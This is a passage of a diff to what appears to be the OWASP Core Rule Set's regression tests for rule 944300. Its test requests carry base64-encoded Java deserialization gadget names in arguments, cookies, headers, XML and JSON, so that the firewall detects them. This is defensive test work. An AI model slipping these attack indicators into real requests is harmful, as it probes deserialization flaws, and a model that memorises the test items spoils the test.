uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_id: 275 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 277 desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 